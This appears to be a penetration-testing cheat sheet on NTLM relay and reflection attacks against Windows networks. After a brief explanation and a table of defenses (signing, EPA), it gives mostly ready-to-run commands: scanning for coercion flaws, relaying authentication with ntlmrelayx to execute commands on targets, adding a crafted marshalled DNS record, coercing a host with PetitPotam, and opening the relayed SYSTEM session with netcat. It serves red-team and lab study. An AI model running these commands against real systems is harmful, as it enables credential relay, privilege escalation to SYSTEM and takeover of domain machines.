# Relay Attack

## Information

After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to relay that authentication to targets of his choosing.

<table data-header-hidden><thead><tr><th width="92.90234375"></th><th></th></tr></thead><tbody><tr><td><strong>Coerce</strong></td><td>Techniques that enable attackers to redirect traffic or redirect/force targets authentications.</td></tr></tbody></table>

<table><thead><tr><th width="108.1484375">Difenses</th><th width="208.609375">Required</th><th width="233.48828125">Enabled</th><th>Disabled</th></tr></thead><tbody><tr><td><strong>Signing</strong></td><td>All sessions must be signed.<br>If the peer doesn’t support signing, the connection is refused, preventing NTLM relay on SMB/LDAP. ​</td><td>Negotiates signing if the peer supports it. <br>If not, the session may proceed unsigned. </td><td>No signing</td></tr><tr><td><strong>EPA</strong></td><td>Channel binding that ties auth to the TLS channel (server certificate), preventing NTLM relay on TLS services like HTTPS/LDAPS. ​</td><td>Used when both sides support it. <br>If either side lacks support, auth proceeds without EPA. ​</td><td>No channel binding</td></tr></tbody></table>

The LM and NTLM authentication protocols are "application protocol-independent". It means one can relay LM or NTLM authentication messages over a certain protocol, say HTTP, over another, say SMB. That is called cross-protocols LM/NTLM relay. It also means the relays and attacks possible depend on the application protocol the authentication messages are embedded in.

<figure><img src="https://797548868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhqLG4rHdEASJgZEcYdEJ%2Fuploads%2FJCiYR24vIYw5Xm6dKz4g%2Fimage.png?alt=media&#x26;token=e04ee872-f1b0-4b9c-a06d-30b7bae1cd91" alt=""><figcaption></figcaption></figure>

<figure><img src="https://797548868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhqLG4rHdEASJgZEcYdEJ%2Fuploads%2F7k6dpmGifXkkLcQi6yqM%2Fimage.png?alt=media&#x26;token=c807a380-f941-4f2d-8744-d8eff9d4c101" alt=""><figcaption></figcaption></figure>

For details, see [HERE](https://beta.hackndo.com/ntlm-relay/).

## Detection

With [NetExec](https://github.com/Pennyw0rth/NetExec) and [Coercer](https://github.com/p0dalirius/Coercer) we can verify coercion vulnerabilities,&#x20;

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus
```

{% endcode %}

{% code overflow="wrap" %}

```bash
coercer scan --target-ip <IP> -u <USER> -p <PASS>
# coercer coerce --target-ip <IP> --listener-ip <MYIP> -u <USER> -p <PASS> --filter-protocol-name "<PROTOCOL_ex_MS-EFSR" --filter-method-name "<METHOD_ex_EfsRpcAddUsersToFile"
```

{% endcode %}

We can also verify SMB signing status and channel binding

{% code overflow="wrap" %}

```bash
nxc ldap <IP> -u <USER> -p <PASS> -M ldap-checker
```

{% endcode %}

## Relay

If you are unable to crack the NTLM hash, we can try to relay the authentication to another system. In fact, a user on one machine might be local administrator on another. If he is, we can run commands because no UAC confirmation required. If UAC remote restrictions are enabled on the target, we can only use the local *Administrator* user for the relay attack.

With [impacket-ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)

{% code overflow="wrap" %}

```bash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"
```

{% endcode %}

## Reflection

Allowing attackers to impersonate high-privilege users (especially SYSTEM or administrators).

<details>

<summary>Description</summary>

Windows uses hostname comparison to determine whether NTLM authentication is local. If it concludes that the target is itself, it engages **local NTLM mode**, which skips challenge-response verification and inserts the token directly into memory.

This logic breaks when using **crafted DNS names** that include marshalled metadata. Windows parses the DNS string, strips the metadata, and compares only the hostname (e.g., `localhost`), wrongly concluding the connection is local.

As a result, **SYSTEM processes like `lsass.exe`** can be coerced into authenticating to an attacker-controlled listener. The attacker then **relays that SYSTEM token back via SMB**, gaining **SYSTEM-level access**.

</details>

Verify SMB signing status and coercion vulnerabilities

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus
nxc smb <IP> -u <USER> -p <PASS> -M ntlm_reflection
```

{% endcode %}

Prepare **ntlmrelayx** (impacket) to intercept NTLM authentication and relay it back to the target

{% code overflow="wrap" %}

```bash
ntlmrelayx.py -t [<PROTO>://]<IP/DOMAIN> -smb2support [-i]
# impacket-ntlmrelayx -t <DC01.DOMAIN.COM> -smb2support
# impacket-ntlmrelayx -t winrms://<IP> -smb2support
# impacket-ntlmrelayx -t all://<IP> -smb2support
```

{% endcode %}

Craft a special DNS entry to trick Windows into believing it’s communicating with itself

{% code overflow="wrap" %}

```bash
python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASS> <DC01.DOMAIN.COM> -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d <MyIP> -dns-ip <IP>
```

{% endcode %}

Now use **NetExec** or [**PetitPotam**](https://github.com/topotam/PetitPotam) to coerce the victim host into initiating an outbound NTLM authentication using our spoofed DNS name:

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA [-k]
```

{% endcode %}

{% code overflow="wrap" %}

```bash
python3 PetitPotam.py -u <USER> -p <PASS> -d <DOMAIN> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <DC01.NANOCORP.HTB> [-k]
```

{% endcode %}

Finally, we can connect with netcat (see **ntlmrelayx** output)

```
nc 127.0.0.1 11000
```